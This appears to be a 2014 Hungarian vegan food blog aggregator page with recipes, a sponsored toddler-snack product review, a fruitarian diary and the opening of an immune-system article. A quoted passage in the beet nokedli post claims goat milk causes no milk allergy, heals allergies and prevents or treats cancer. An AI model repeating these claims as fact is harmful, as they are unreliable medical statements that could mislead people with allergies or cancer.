Ma van az első helyi piacunk itt a pici falunkban, erre az alkalomra készítettem ezt a néhány finom, nyers édességet ? ? ? Hozzávalók: 2 db reszelt alma 1 maréknyi zabnyák 2 ek zabpehely 1 ek darált lenmag 1 kk vanília 2 tk kókuszvirág cukor 1 tk friss reszelt gyömbér 2 kk fahéj 1 tk […]
Táplálj helyesen édesanyám! (6. rész) + Kedvezménykupon
2014. szeptember 30. Zizi kalandjai
Többen kértétek, hogy adjak tippeket milyen ételeket érdemes vagy jó uzsonnára, snacknek pakolni egy majdnem másfél éves babának. Ádi most már szinte ugyanazokat eszi, amelyeket mi is fogyasztunk. Tízórait ritkábban eszik, mert később szokott reggelizni (nem egy koránkelő baba), azonban a délutáni alvás után mindig van egy- vagy többféle finomság, amit megkóstol. Ez függ attól is, hogy otthon vagyunk vagy éppen úton.
Ha otthon vagyunk bármilyen étel szóba jöhet, mert minden a rendelkezésünkre áll: kanál, villa, tányér, asztal, stb. Ha úton vagyunk valahova, akkor érdemes olyat csomagolni, amely könnyen fogyasztható, kézzel/kanállal ehető, nem maszatol túlzottan, ráadásul finom és egészséges is.
Néhány tipp, hogy nálunk mi a menő snack:
- szezonális gyümölcsök: alma, narancs, banán, szőlő, avokádó
- szezonális zöldségek: répa, sült sütőtök
- vegán sajt kockákra vágva
- natúr kölesgolyó
- Alnatura teljeskiörlésű ropi
- almás zab palacsinta
- banános palacsinta
- cukormentes tripla szezámos keksz
Az almát szereti egészben is enni, de vághatjuk szeletekre, kockákra, ha még nehezebben rág a baba. A narancsot többnyire megpucolva, gerezdekre szedve csomagolom el. A banánt és szőlőt önállóan eszi Ádi, az avokádót pedig vihetjük félbe vágva, folpackba csomagolva és kanállal eszi meg a húsát a baba. Ádi a répát simán elrágcsálja, a sült sütőtök pedig szintén kanállal ehető. A vegán sajthoz jól passzol a natúr kölesgolyó vagy a ropi (amely egyébként cukormentes is!). Persze mindez az őszi szezonhoz igazodik, ha nyár lenne, nyilván mást pakolnék uzsonnára.
Ami az innivalót tekinti, többnyire vizet vagy almalevet viszünk magunkkal.
Szeretem vidám, környezetbarát dolgokba csomagolni az uzsonnát. Beszerezés alatt vannak rozsdamentes acél dobozkák, amelyekbe sok minden tehető. Fontosnak tartom, hogy ha műanyag dolgot használok, akkor azok BPA és PVC mentesek legyenek (erről bővebben írtam itt). A Skip*Hop Magyarországtól lehetőséget kaptunk újabb termékek tesztelésére, olyan termékekére, amelyek az uzsonnáztatást teszik színesebbé, vidámabbá.
Uzsonnás táskájuk 13 féle színben (állat formában) kapható. A kis ételtároló táska belseje hőszigetelt, frissen tartja a benne tárolt ételt. Tágas egyterű rekeszében praktikusan helyezhető el a szendvics, gyümölcs, snack vagy ital stb. Belső hálós zsebében evőeszköz, szalvéta is tárolható, ezenkívül beleírhatjuk a gyermekünk nevét. Könnyen tisztítható, nedves ruhával letörölhető, lemosható. Hátizsákként nem használható, csak kézben fogható vagy felakasztható (pl: a babakocsira).
A kulacsaik (11 féle színben kapható) BPA-mentesek, ftalát-mentesek, és PVC-mentesek. Minden kulacsban szívószál található, amelyet flip-top kupak véd, így a kulacs nem csöpög. Az üveg és a szívószál is könnyen tisztítható, mosogatógépben mosható. Tartozik hozzá egy extra, pót szívószál is.
Ádi nagyon szépen iszik már pohárból, palackból is, de a szívószállal még csak ismerkedik. Tetszik neki, ha buborékot fújok vele a kulacsba vagy a pohárba, tanítom a használatára, de egyelőre még nem a rendeltetésének megfelelően használja.
Mindkét termék elnyerte a tetszésünket. Ádi uzsonnáját sokszor a táskámba tettem bele, külön volt minden, a cumisüvegtől kezdve a kis dobozkákig. Az uzsonnás táska maximálisan ki van használva, mindent egy helyre tudok tenni, Ádi pedig imádja hordozgatni, kinyitni, ki- és bepakolni belőle mindent. A kulaccsal pedig egyelőre ismerkedünk, biztos vagyok benne, hogy hamarosan menni fog a szívószállal való ivás.
Anya magyaráz, Ádi koncentrál
A Skip*Hop elérhető az alábbi linkeken:
- weboldal
- Facebook oldal Skip*Hop Magyarország és Monkie
Az uzsonnás táskát és a kulacsot a {Monkie} biztosította a teszteléshez. A véleményem csakis a sajátom.
*****
KEDVEZMÉNYES VÁSÁRLÁSI LEHETŐSÉG A ZIZI KALANDJAI OLVASÓINAK!!!
Aki 2014. szeptember 29 és 2014. október 10-e között vásárol Skip Hop, Yeominis, Stor it vagy Frank&Fischer márkájú termékeket a Monkie oldaláról az 10% kedvezményben részesül (a végösszegből kerül levonásra). A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZI10. Jó vásárlást mindenkinek!
Természetesen szeretem ...
2014. szeptember 29. Nyers konyha
Krémek krémje! Aki a tudatosság útjára lép és elkezd ennek megfelelően élni, táplálkozni, előbb vagy utóbb eljut oda, hogy a kozmetikumok közül is a tiszta, természetes összetételűt keresi. Találtam néhány hónapja egy magyar krémet, amit szeretnék bemutatni, mert nekem bevállt. A bőröm alpvetően száraz, igényli a hidratálást. Régebben délben még egyszer meg kellett ismételnem arcom krémezését, mert feszült, száraz volt. Ez a krém estig kitart, nem kell magammal cipelni mindenhova. Reggel elég gyűrött tud lenni az ember, hát én is, de ahogy felkenem a krémet, már látványosan kezd kisimulni az arcom. Sminkelni csak minimálisan szoktam, kis szempillaspirál, pirosító. Korábban sokszor lefolyt, elkenődött a szemem alatt a festék. Ez a krém is tartalmaz, olajat, növényi zsírt, de azonnal felszívódik, nem hagy sem zsíros érzést, sem nyomot maga után. Az első doboz arckrémem 2 hónapig is kitartott, mert nagyon kevés elég belőle. Csupa növényi finomság van benne, mondhatni vegán termék, állatokon nem tesztelik. Méh viaszt viszont tartalmaz 1-2 krém. Van szérumuk bőrfiatalításra, szintén csak ajánlani tudom, én is használom, és van dezodorjuk is, ami nálam függőséget okozott ! :) Ja és még egy érdekes dolog, az arckrémekhez, étrend- kiegészítőket is lehet venni, mert a cég tisztában van vele, hogy a szép bőr a táplálkozással kezdődik! http://www.wisetreenaturals.hu/index.php/hu/
"Trüfli"
2014. szeptember 28. Kertkonyha
Itt van álmaim bonbonja, olyan, akárcsak a legmenőbb belga manufaktúrák mélyéből előkerülő kincsek: édes is, kesernyés is, és persze csodálatosan illatos is. Keveredjenek az ízek, járjanak táncot a textúrák! És mindezt egyetlen bonbonban, amihez nem is kellenek csili-vili hozzávalók, egyszerűen csak minden legyen friss és jó minőségű.Hozzávalók kb. 20 nagyobb bonbonhoz:
[...] Bővebben!
Vegán sütőtökös latte, avagy a Starbucks pumpkin spice latte-nak az otthon készített változata
2014. szeptember 26. Zizi kalandjai
Nem terveztem új bejegyzést jövő hétig, de a mai reggelink olyan finom volt, hogy nem hagyhattalak benneteket cserben… így most van esélyetek nektek is kipróbálni, mondjuk vasárnap olyan kényeztetős reggelire ezt a habos, meleg sütőtökös italt.
Nagyon ritkán térek be a Starbucks-ba, sőt eleve kávézni is ritkán szoktam, csak a “feelingje” miatt teszem, mert engem a kávé nem tart ébren… ugyanúgy tudok szundítani tőle, mintha nem innék. Az italok nem olcsóak, arról nem is beszélve, hogy a habos, extra italaik túl édesek számomra. Az őszi-téli időszakban nagy sláger náluk a pumpkin spice latte… nem tudom, hogyan készül, de nem hiszem, hogy ők raknak bele igazi sütőtököt, inkább csak a fűszerekkel próbálnak az ízlelőbimbóinkra hatni. Na, a sütőtökös latte házi változatába kerül igazi sütőtök a fűszerek mellé. Ha még egészségesebben szeretnénk elkészíteni, akkor az igazi kávét lecserélhetjük gabonakávéra vagy esetleg valamilyen teára – ami persze ízben passzol a sütőtökhöz. Az ügy érdekében, hogy tényleg az igazira hasonlítson az italom, beszereztem egy szója tejszínhabot. Nem használtam még soha ilyen habot, de kellemesen csalódtam az ízét és az összetevőket tekintve is.
Szóval ne habozzatok, süssetek sütőtököt szombaton, hogy vasárnap pikk-pakk össze tudjátok turmixolni az új reggeli italotokat. Finom, habos, fűszeres… kell ennél több? Ja igen, mondjuk Józsi pihe-puha croissant-ja… Ezzel lett tökéletes a mai reggelünk!
Vegán sütőtökös latte
(Recept inspiráció: Healthy Happy Life)
Hozzávalók 2 főre:
- 2 bögre rizs- vagy mandulatej, felmelegítve
- 2 adag espresso vagy gabonakávé, melegen
- 3 evőkanál sült sütőtökpüré
- 1 teáskanál juharszirup (nádcukor, méz, agavé szirup is használható édesítésre ízlés szerint)
- fahéj
- szerecsendió
- szója tejszínhab, tálaláshoz
Tegyük a turmixgépbe a rizstejet, kávét, sütőtökpürét, juharszirupot és fűszereket. Turmixoljuk simára, habosra. Öntsük bögrékbe és tálaljuk tejszínhabbal, fűszerekkel megszórva a tetején.
Céklás nokedli kecskesajttal és pörkölt dióval
2014. szeptember 25. Zöld Avocado
céklás nokedli kecskesajttal és pörkölt dióval A minap rábukkantam a nokedli szaggatómra a fiókban. :-) Eszembe jutott, hogy milyen rég készítettem nokedlit. Általában az együtt jár a pörkölttel, ami mostanában nálunk ritkán látott étel az asztalon. Elkezdtem gondolkozni, hogy milyen emészthetőbb és értékesebb verzióját lehetne elkészíteni a nokedlinak?! Böngészgettem egy kicsit a neten, és rábukkantem erre a gyönyörűségre: céklás nokedli. Elképesztő színe van! ;-) Ami pedig ilyen mutatósan néz ki, az csak finom lehet. Így hát tudtam, hogy ez lesz a vacsora holnap. De mi készüljön mellé? Tudtam, hogy nem sok időm és kedvem lesz a konyhában állni, mert elég fárasztó hét van mögöttem, ezért mindenképpen valami egyszerűt szerettem volna. Erre most sokan felnevethetnek, hogy 'egyszerűt?! De hát a nokedli az már önmagában egy macerás étel!'... Szerintem nem. Ha van egy jó kis nokedli szaggatód... ...és nem nagy mennyiségben készítesz galuskákat, akkor szerintem nem olyan munkaigényes a dolog. Persze mosogatni valót csinálunk vele bőven, főleg, ha a tészta cékla piros! :-D Ha már cékla, akkor legyen mellé valami karakteres sajt, meg dió, mert azokkal nagyon jó párosítva. Együnk mellé kecskesajtot, mert azt sosem eszünk, pedig számos értékes tápanyagokat tartalmaz. "A kecsketej az összes tejfajta közül a legegészségesebb - vitamintartalma sokkal magasabb, mint a tehéntejé, és a tejérzékenyek is fogyaszthatják. Az anyatejhez hasonlóan a kecsketej béta-kazein alkotórésze miatt tejallergiát nem okoz. Sőt hatásos az allergiák gyógyítására és a daganatos betegségek megelőzésére. A kecsketejben a kalcium, magnézium és foszfor aránya, valamint felszívódási képessége az ember számára a legmegfelelőbb, a csontritkulás megelőzésére és a már kialakult betegség szinten tartására is alkalmas. A kecsketej ,,teljes tej, tehát fogyasztása esetén kevesebb is elég belőle. Könnyen emészthető. Fontos szerepet tölt be a gyomorproblémákkal, emésztési zavarokkal küszködők táplálkozásában. Magas fehérjetartalma miatt az idős korosztály kiváló roborálószere. A kecske és a juhtej jelentős mennyiségű orotsavat tartalmaz. Ez a sav jelentős védelmet nyújt a rákos megbetegedések ellen. Talán ez az egyik oka annak, hogy újabban a kecsketejet előszeretettel javasolják a daganatos betegek gyógyításában." forrás: www.almamag.hu Nagyon kevés hozzávalóból, kevés konyhai hozzáértéssel elkészíthető ez az étel, így kezdőknek is bátran ajánlom! HOZZÁVALÓK: kb.4 főre, vagy 2 főre, de 2 vacsorára ;-) - 300 g teljes kiőrlésű tönköly liszt - 2 tojás (lehetőleg bio farmról) - 2 kisebb nyers cékla (nem előfőzött) - Himalája só - (1 ek útifűmaghéj) - 1-2 dl víz - 1 ek + 1 tk extra szűz olíva olaj - kecskesajt, ízlés szerinti mennyiségben (nálam kb.400g fogyott el 4 főre) - dió, szintén ízlés szerinti mennyiségben ELKÉSZÍTÉS:A nyers céklákat meghámozzuk, megmossuk, és kockákra vágjuk. (Hasznos lehet egy eldobható latex kesztyű, hogy elkerüljük a még másnap is jól látható cékla nyomokat a kezünkön. ;-) ) A céklakockákat, a tojásokat és a vizet beletesszük a turmix gépbe, és a két késes darabolójával pürésítjük. (Ha szükséges kevés vizet engedünk hozzá.) Egy tálba beletesszük a lisztet, egy kevés sót, és hozzákeverjük a cékla turmixot. El is készült a céklás nokedli tészta. A hagyományos módon kifőzzük: nagy lábasban sok vizet forralunk, sóval, és egy kevés olajjal. Amikor forr a víz, elkezdjük beleszaggatni a galuskákat. Amikor feljönnek a víz tetejére leszűrjük, és hideg vízzel öblítjük. (Ha nem elég kemény a tészta, tehetünk hozzá még lisztet.) Miután az összes nokedli elkészült, egy teáskanál olíva olajjal összekeverjük a kész nokedliket a tálban, hogy ne ragadjanak össze. A kecskesajtot felmorzsoljuk. A diót egy olaj mentes teflon serpenyőben kisebb darabokra tördelve pár perc alatt megpörköljük. Vigyázzunk, ne kokszoljon oda! Piszkálgassuk közben egy fakanállal. ;-) És ennyi! A pink nokedlikre rászórjuk a morzsolt kecskesajtot, és a diót. És már ehetjük is az igen látványos vegetáriánus sztrapacskánkat. :-) céklás nokedli kecskesajttal és pörkölt dióval Féltem tőle, hogy száraz lesz, és hiányozni fog egy kis öntet, vagy szósz róla, ezért készítettem 1 evőkanál extra szűz olívaolajból és 1 frissen facsart citrom levéből öntetet rá. Nagyon nagy meglepetésemre egyáltalán nem volt rá szükség. Csak úgy csúszott az a rózsaszín nokedli citromlével és citromlé nélkül is. ;-) És hogy milyen íze van? Ez is meglepő! Mert egyáltalán nincs cékla íze. Egy kicsit a sztrapacskához tudom hasonlítani, de mégis más. Próbáljátok ki, és mondjátok el a véleményeteket! Megjegyzés1: Ha valaki nem szereti a kecskesajtot, vagy túl drágának találja, helyettesítse görög Feta sajttal, vagy akár márvány/kék sajttal. Ezekkel is rendkívül ízletes ételt fogunk kapni. Megjegyzés2: Ha van otthon útifű maghéj, érdemes a tésztába tenni 1 evőkanállal. Ezesetben azonban várjunk 10-15 percet a nyers tésztával, míg a forrásban lévő vízbe dobjuk őket, hogy legyen ideje a maghéjnak megszívnia magát. Megjegyzés3: A friss cékla levelét alaposan megmosva salátaként elfogyaszthatjuk az étel mellé, mert a levele is rendkívül egészséges. Sajnos az enyémek betegek voltak, így inkább most csak dekorációnak használtam fel őket. céklás nokedli kecskesajttal és pörkölt dióval
Dilemma - KELL EZ NEKEM??
2014. szeptember 24. Sose mondd, hogy soha
Lelkesedés ezerrel, büszkeség, élvezet. Aztán puff. 10 tiszta gyümölcsevő nap után nyakamba szakadt a vasárnap. Hosszú, sűrű nap volt, csupa jó program, de túl sok... és még messze nem volt vége, amikor elérkezett a vegán aktivista tali ideje. A Kozmoszban tartottuk, ami a város legjobb vegán étterme. Nem rontottam el a tökéletes félévet, nem ettem semmi olyat, ami nem volt nyers. De szenvedtem. Nem kicsit. Önkínzásnak éltem meg azt, hogy ragaszkodom az elhatározásomhoz. Nem hiszem, hogy ez így jó. Ami valójában lelkileg fájt az ez: nem tudok együtt enni a barátaimmal. 3 és fél éve, amikor vegán lettem, szinte teljesen egyedül voltam. Két vegánt ismertem csak. Mostanra van legalább 50-60 vegán haver, akikkel együtt terjesztjük az együttérző életmódot. Velük ülök együtt és mégsem tudok velük együtt enni. Egyedül érzem magam, kilógok... Nem ezt akartam. Másnap délben úgy mentem el a melóhelyem melletti falafeles előtt, hogy átmentem a túloldalra, hogy ne érezzem az illatokat. Tele volt az agyam a Kozmoszban megtapasztalt illatokkal és képekkel. Felizgatva éreztem magam - nem úgy. Hanem úgy agyilag, kajailag. Nem volt jó érzés. Ráadásul volt két lukasórám, így még időm is akadt, hogy falafelezzek. Ültem a szobában, pötyögtem a gépnél és erősen próbáltam nem kimenni. Erre bejön Dani és még meg se szólal, csak odahajol puszit adni, már érzem a száján... Szeráj... Kész, ez volt az utolsó csepp. Teljesen egyedül vagyok. Semmi értelme az egésznek. Megyek és eszem egy falafelt. És mentem és ettem egy falafelt. B@ssza meg... Nem tudom, fog-e ez menni nekem. Nem tudom, akarom-e, hogy menjen. Etikai vegánnak indultam. Állatvédőnek, aki azt hirdeti, hogy nem kell lemondani semmiről, csak helyettesíteni kell növényi alapúval. Legyen bár olaszos, kínai, magyaros, franciás, bármilyenes kaja, mindent meg lehet csinálni vegánul és finom és szinte észre sem veszed a különbséget. Viszont egészségesebb. Vegánnak lenni élvezet! Mindez így igaz. Továbbra is ezt reklámozom. De közben nem ezt élem. A barátaim néhány kivétellel most is eszerint élnek és jól vannak. S nekem most is az állatvédelem a legfontosabb. Miért csinálom ezt az egész önkínzást? Szeretném visszakapni a régi életem egyszerűségét. A heti egy bevásárlást a szupermarketben, a házi hot dogot, a tésztás kajákat, a tofut, a reggeli lekváros pirítóst, a szendvicseket és persze az együtt evést, az összetartozást. Nem kényszerít senki. Nekem kell döntenem. Hetek óta Don Bennett könyveit olvasom (gyümölcsevő 20 éve) és lenyűgöz a belőlük áradó józan ész, logika, humor, egyszerűség. Imádom a pasit és elhiszem neki, amiket ír. Hogy élhetnék úgy, mintha nem olvastam volna? Dani szerint egyszerű (mint minden...). A mindennapokban eszem, ahogy helyesnek tartom és közösségi eseményeken eszem együtt a többiekkel a főtt vegán kajákat. No problem. De nekem problem. Identitás problem. hogy akarok élni, mit akarok mutatni, hirdetni? Ma meghívtak az rtl egyik műsorába beszélni a vegán életmódról. Mit válaszolok, ha megkérdezik, mit szoktam enni egy nap? Állatvédelmileg is a gyümölcsevő életmód lenne a legjobb, hiszen hosszú távon az egészséges népesség valóban nem fog állatokon kísérletezni. Amíg vannak betegek, ez lesz az utolsó állatkínzás, amit még meg fognak tartani. De nem állhatok oda egy totál vegyes táplálkozású ember elé azzal, hogy egyen reggelire zöld turmixot, ebédre banánt, datolyát, aztán zárjon este egy akkora zöld salátával, ami egy 4 tagú családnak is kihívás lenne... ...vagy mégis? Nem akarok visszafordulni. De nem tudom, merre van előre.
Vasárnapi nagybevásárlás (szept. 21.)
2014. szeptember 23. Sose mondd, hogy soha
- paradicsom 1 rekesz 3300 (nem írtam fel, hány kiló, de kb 15-20 lehetett) - - fejes saláta 1 rekesz (8db) 700 - - mazsola 2 kg 1500 - - kesudió 1 kg 2300 - - rukkola 16 doboz 3200 - - narancs 22 kg 4000 - - banán 1 doboz 6600 (elfelejtettem, hány kiló, de fel tudtam emelni, úgyhogy max 30) - - brokkoli 1 rekesz 1500 (ez a kutyakajába kell) A múlt héten vett banánok szépen megértek nálunk az előszobában, még most is azt esszük és a most vetteket érleljük, ugyanez érvényes a narancsokra. A paradicsom, az uborka, a rukkola szépen elfogyott a múlt héten. A kutyáknak vett lencse és árpa még tart. Találtam a piacon olyan gyömyörű aszalt fügét, hogy majd' elsírtam magam, de 3000 volt kilója, úgyhogy otthagytam és maradunk az 1500/kilós áron kapható nem annyira tökéletesnél. A mazsola esetén jó ez a legolcsóbb típus, beáztatjuk és turmixot édesítünk vele. A kesudióból is az olcsóbbikat vesszük, de abból picit idővel majd csökkentenem kéne a fogyasztásomat, mert túl sok zsírt eszem, de ideiglenesen engedélyezem magamnak, mert annyira finom a kesutejfölös paradicsomsalim... amiről már korábban olvashattál (http://sosemonddhogysoha.blogspot.hu/2014/07/barmi-valtozhat.html) A rukkolával kapcsolatban elszomorít, hogy nem tudom, látott-e valaha talajt, vagy csak vízben nevelték és így a tápanyagtartalma sem az igazi, de imádom az ízét és imádom, hogy 220 forintért kapom meg dobozát a piacon. A narancs sem a legjobb, mert nem az az igazi érett narancs, de 180 ft/kg áron nem lehet otthagyni. Itthon műanyag rekeszekben lazán pakolva elücsörög és amikor érettebbnek tűnik, kegyetlen kifacsarás áldozatává válik....
Újra rendelhető a Fibonacci nyers vegán csokoládé
2014. szeptember 21. Répa Konyha
A nyári meleg idő után újra rendelhető online a Fibonacci nyers csokoládé tábla! A Fibonacci 'Aktív Kakaó' Csokoládé organikus alapanyagokból (nyers kakaó massza, nyers kakaó vaj, nyers agave.), kézzel készített, nyers vegán, 80% kakaótartalmú (a legfinomabb, criollo fajtából). Gluténmentes és az alacsony glikémiás indexű agavéval van édesítve. Gondosan temperált, roppanós állagú. 80g táblás csokoládé 1590 Ft. A nyers kakaóról és csokoládéról bővebben! Narancsos-ropogós, Levendulás-kendermagos ízekben vagy a Natúr változat, a tiszta nyers csokoládé-élmény szerelmeseinek! Személyesen a Madal Caféban vásárolhatjátok meg, a Jászai mari térnél Budapesten.
Bazsalikomos saláta
Hozzávalók: 5-6 db nagyobb leves édes paradicsom 4 db vastaghúsú paprika 1 kis fej lilahagyma 8-10 olivabogyó 1 ág friss bazsalikom 1 ek hidegen sajtolt napraforgó olaj 1 tk gyümölcscukor / sztívia / xilit 1/2 tk só A paradicsomokat és a paprikákat lemossuk, az utóbbiakat kicsumázzuk, majd mindet felaprítjuk. A lila hagymával hasonlóan járunk el. A bazsalikom leveleit letépkedjük, apróra szakítjuk, és a saláta többi összetevőjéhez adjuk. Az olivabogyókat is belekarikázzuk. Mindezt megszórjuk kevés cukorral, sóval, összekeverjük, és a végén meglocsoljuk olajjal. Rövid ideig hagyjuk az ízeket összeérni. Ha kissé tartalmasabbá szeretnénk tenni, belevághatunk uborkát, és süthetünk hozzá kevés kókuszsírban bevagdosott szójavirslit, teljes őrlésű tésztával kínálhatjuk. Adhatunk hozzá pirított tofukockákat kissé befűszerezve, vagy aki nem vegán feta sajttal keverheti.
Dani kedvence turmix
2014. szeptember 17. Sose mondd, hogy soha
A kedvenc turmix fogalma folyamatosan változik, ahogy változnak az évszakok. Az elmúlt hetekben a szilva volt olcsó, így arra álltunk rá. Magam azonban utáltam a szilvát mindig is, így az még nagyon messze van, hogy csak úgy megegyem. Ezért született a szilvaturmix ötlete. Ami azonban savanyú volt. Így került bele a mazsola. A mazsolát érdemes beáztatni előző nap, könnyebben viszi a turmixgép és így jobban édesíti a cuccost. A minap a zöldségesnél találtam egy nagy vályúban túlérett áfonyát merészen leárazva. Elhoztam az összeset s 2 napig minden turmixunk áfonya ízű volt. Így született ez a kép is. De ami a szilva turmixot illeti, az simán megvan 1 kiló felkockázott szilvából és 10 dkg beáztatott mazsolából és nagyon finom. Ideális reggeli őszi napokra.
Vegán kókuszos kuglóf csokoládé ganache-sal + Segítsüti 2014. ősz
2014. szeptember 15. Zizi kalandjai
Augusztus elején kaptam az emailt Évától, hogy lenne-e kedvem részt venni az idei őszi Segítsüti jótékony akcióban. Titkon reméltem, hogy egy nap majd kapok egy ilyen felkérő emailt, szóval örömmel mondtam igent a részvételre.
A Segítsüti története 2009-ben indult, az első, gasztrobloggerek civil összefogásával született jótékonysági süteményárveréssel. Mostanra kinőtte magát, így évente kétszer kerül már megszervezésre, tavasszal és ősszel. A mostani, 11. alkalommal a Segítsüti támogatottjai a Leukémiás Gyermekekért Alapítványon keresztül a kelet-magyarországi leukémiás megbetegedésben szenvedő gyermekek lesznek.
Röviden a részletek (hosszabban pedig itt)…
1) Kik? Ismét 30 gasztroblogger anyuka/apuka készül 30 édességgel, az akció adminisztrációját – beszerzések, pénzügyi elszámolás – pedig szokás szerint a Sose Közhasznú Alapítvány intézi.
2) Mikor? A sütilicit 2014. szeptember 15-én, hétfőn indul, azaz ma fognak megjelenni a sütis bejegyzések az egyes blogokon, és kerülnek fel majd egyidejűleg a licitálós menü alá. Ezután kezdődhet rájuk rögtön a licitálás, amely három napon át zajlik és 2014. szeptember 18-án, csütörtökön 16:00-kor zárul.
3) Kit támogatunk? A befolyt támogatási összegből most a Leukémiás Gyermekekért Alapítványt és rajtuk keresztül a daganatos és vérképzőszervi megbetegedésben szenvedő gyermekek orvosi ellátását, gyógyulását támogatjuk.
4) Hogyan? Minden tepsi sütemény kikiáltási ára továbbra is 1.000 forint lesz. A liciteket a Sütiárverés menüpont alatt lehet majd megtenni, ehhez pedig egy egyszerű regisztráció (név, e-mail cím) szükséges. A nyertes az lesz, aki a legmagasabb összeget ajánlja adott süteményért szeptember 18-án 16:00-ig.
Én erre az őszi eseményre egy vegán kókuszos kuglóffal készültem, amibe csempésztem egy kis kardamomot, majd leöntöttem az egészet vegán csokoládé ganache-sal. Jól hangzik, ugye? És én már tudom is, hogy mennyire finom! Aki megteheti, licitáljon a kuglófomra, mert a nyertes licitáló nagyon jól fog járni ezzel a finom sütivel! Fontos infó a nyertes számára, hogy a kuglóf személyesen vehető majd át Budapesten. Hajrá licitálók!
Vegán kókuszos kuglóf csokoládé ganache-sal
Hozzávalók:
A kuglófhoz:
- 400 g finomliszt, szitálva
- 100 g teljeskiörlésű liszt, szitálva
- 120 g kókuszvirág cukor + 1 teáskanál (nádcukorral helyettesíthető)
- 30 g kókuszreszelék
- 30 g puha kókuszzsír
- 250 ml kókusztej (kókuszos rizstejjel helyettesíthető) + amennyit a tészta felvesz (kb. 150-200 ml)
- 1/2 teáskanál kardamom
- 1 csomag (7 g) szárított élesztő
- csipet só
A ganache-hoz:
- 20 g kakaópor/karobpor, szitálva
- 1 evőkanál mandulavaj
- 50-60 ml juharszirup
- 40 g kókuszzsír
- csipet só
Egy tálban keverjük össze: liszteket, kókuszreszeléket, kókuszvirág cukrot, sót és kókuszzsírt. Langyosítsuk meg a kókusztejet, adjuk hozzá az élesztőt és 1 teáskanál cukrot, hagyjuk felfutni néhány perc alatt, majd öntsük a lisztes keverékhez. Keverjük össze a tésztát, majd kézzel dagasszuk át és közben adagoljunk hozzá annyi kókusztejet, amennyit a tészta felvesz (ez kb. 150-200 ml lesz a növényi tej fajtájától függően). Az összegyúrt tésztát a tálban hagyva, fedjük le konyharuhával és hagyjuk meleg helyen duplájára kelni (ez kb. 1 óra).
A megkelt tésztát borítsuk lisztezett deszkára és gyúrjuk át. Formázzunk rudat belőle, gyengéden csavarjuk meg és tegyük bele a puha kókuszzsírral kikent kuglóf formába (a végeket szorosan összecsipkedjük).
A formában újból pihentetjük 30 percet, majd 170 fokra előmelegített sütőben kb. 40 perc alatt aranybarnára sütjük. Tűpróbával ellenőrizzük, hogy átsült-e! Hagyjuk a formában kihűlni.
A ganache-hoz egy lábasban melegítsük át a juharszirupot, a kókuszolajjal, a mandulavajjal és a kakaóval. A tűzhelyről levéve adjuk hozzá a csipet sót. A langyosra hűlt ganache-sal locsoljuk meg a kihűlt kuglófot.
Őszi nyers torta
2014. szeptember 11. Szelíd életmódváltók
Nyers süti az a műfaj, amibe teljesen szerelmes vagyok. Na jó, bevallom, imádom krémes édességeket. Erre kerestem egy olyan alternatívát, ami egészséges, finom és krémes egyszerre. Találtam. Elég sokat kísérleteztem az állaggal. Első próbálkozásaim ízre finomak voltak ugyan, de mind csakis kanállal ehetőek. Ismerős?
Az őszi tortának az inspirációt ez a torta adta, de ősrégi szokásomhoz híven, abból főzök, ami itthon van.
Hozzávalók:
alap
őrölt lenmag
kókuszreszelék
3-4 aszalt szilva (fügével együtt pár órára beáztatni)
2-3 aszalt füge
————————–
krém
egy maréknyi szilva
2 nagyobb alma
egy maréknyi áztatott kesudió (kókuszkrém lehet helyette, krémessé tesz)
1 banán (elhagyható)
frissen facsart citromlé ízlés szerint
méz vagy agavé szirup
1 ek. folyékony kókuszolaj
1-1/2 ek. utifű maghéj
Elkészítés: Nyers sütiknél az egyik alapdolog a sorrend. Először aszalt szilvát aszalt fügével és kis áztatóvízzel turmixoljuk össze. Ennek pikáns savanykás íze lesz, lehet mézzel vagy más édesítőszerrel édesíteni. A kész masszát öntsük bele egy tálba és keverjük bele kókuszreszeléket és lenmagörleményt, annyit, hogy viszonylag szilárd massza legyen. Az arányok ízlésre bízzuk. A masszát egy csatos tortaforma alján nyomkodjuk bele. Ha nincs csatos tortaforma, legyünk kreatívak, sütőpapírral kibélelt egyenesfalú tál is megteszi.
A krém összes alkatrészét, kivéve kókuszolajat és utifű maghéjat, rakjuk bele turmixgépbe és turmixoljuk krémmé, a végén rakjuk bele két zselésító-szilárdító alkatrészét is. Most csak annyi van hátra, hogy a krémet kenjuk rá a tortaalapra és tegyünk be pár órára, vagy még jobb, egész éjszakára (így a torta élettartama legalább látszólag hosszabb lesz) a hűtőbe.
Szeretettel és akcentussal,
Rita Bakradze
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = //connect.facebook.net/hu_HU/all.js#xfbml=1;
fjs.parentNode.insertBefore(js, fjs);
}(document, script, facebook-jssdk));
Immunerősítés természetesen 1.rész. Mi is az immunrendszer?
2014. szeptember 10. Éltető ételek
Rendszeresen hallunk arról, hogy az immunrendszert erősíteni kell. De mi is az az immunrendszer? Egy olyan védekező rendszer , mely feladata a szervezet belső önállóságának óvása/védése. Tehát a szervezetbe kerülő idegen anyagok felismerése, közömbösítése, lebontása és hatástalanítása. Az immunrendszerről röviden Az immunrendszer részei egyrészt a vérben keringő fehérvérsejtek , másrészt kötőszöveti sejtek. De vannak erre a célra külön szervek is, mint pl. a nyirokcsomók, mandulák, féregnyúlvány, csecsemőmirígy és a lép is. A szervezetbe kerülő idegen anyagokra (antigének) az immunrendszer cellurális vagy humorális immunválasszal reagál. A cellurális során az immunrendszer sejtjei (pl. a fehérvérsejtek) közvetlenül bekebelezik (fagocitózis) az antigént, míg a humorális immunválasz az, amikor ellenanyagok (immunglobulinok) termelődnek, és ez közömösíti az antigént. Az immunitás formái A velünk született (természetes) immunrendszer már magzati korban kialakul. Ezek a fehérvérsejtek (pl. granulocyta, makrofág, természetes ölősejtek), melyek válogatás nélkül, percek alatt minden idegen anyagot bekebeleznek. A legújabb kutatások rámutatnak arra, hogy ezen fehérvérsejtek mozgósítására az 1-3, 1-6 béta-glükánok nagyon jó eredménnyel bevethetők. A szerzett immunitást második védelmi vonalunknak is nevezhetjük. Ezek képesek felismerni a kórokozókat, hiszen egy korábbi fertőzés során már termelődött immunglobulin (ellenanyag). Ez az alapja a védőoltásoknak is. Miért mondjuk azt, hogy a bél az immunrendszerünk FŐ része? Immunrendszerünk 70-80%-a bélfalunk baktériumflórájában található. 1-2 kilógrammnyi haszos baktériumtömeg döntően a vastagbélben helyezkedik el. Ezért nagyon fontos - és szinte a legelső - a bélflóránk 